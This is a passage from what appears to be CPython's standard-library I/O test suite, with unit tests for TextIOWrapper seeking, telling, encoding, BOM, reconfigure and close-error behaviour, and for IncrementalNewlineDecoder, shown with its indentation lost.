self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(os_helper.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(os_helper.TESTFN, "wb") as f:
f.write(line*2)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(os_helper.TESTFN, "wb") as f:
f.write(data)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(os_helper.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(os_helper.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(os_helper.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
f = self.open(os_helper.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
def test_seek_with_encoder_state(self):
f = self.open(os_helper.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable(), encoding="utf-8")
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"), encoding="utf-8")
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"), encoding="utf-8")
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"), encoding="utf-8")
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="utf-8")
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="utf-8")
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO(), encoding="utf-8")
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
self.assertEqual(f.errors, "strict")
with self.open(os_helper.TESTFN, "w", encoding="utf-8", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@threading_helper.requires_working_threading()
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(os_helper.TESTFN, "w", encoding="utf-8", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with threading_helper.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(os_helper.TESTFN, encoding="utf-8") as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata), encoding="utf-8")
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'), encoding="utf-8")
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig has not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "LookupError: unknown encoding: ascii"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertRaises(ValueError, t.__init__, b, encoding="utf-8", newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(os_helper.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
def test_internal_buffer_size(self):
# bpo-43260: TextIOWrapper's internal buffer should not store
# data larger than chunk size.
chunk_size = 8192 # default chunk size, updated later
class MockIO(self.MockRawIO):
def write(self, data):
if len(data) > chunk_size:
raise RuntimeError
return super().write(data)
buf = MockIO()
t = self.TextIOWrapper(buf, encoding="ascii")
chunk_size = t._CHUNK_SIZE
t.write("abc")
t.write("def")
# default chunk size is 8192 bytes so t don't write data to buf.
self.assertEqual([], buf._write_stack)
with self.assertRaises(RuntimeError):
t.write("x"*(chunk_size+1))
self.assertEqual([b"abcdef"], buf._write_stack)
t.write("ghi")
t.write("x"*chunk_size)
self.assertEqual([b"abcdef", b"ghi", b"x"*chunk_size], buf._write_stack)
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
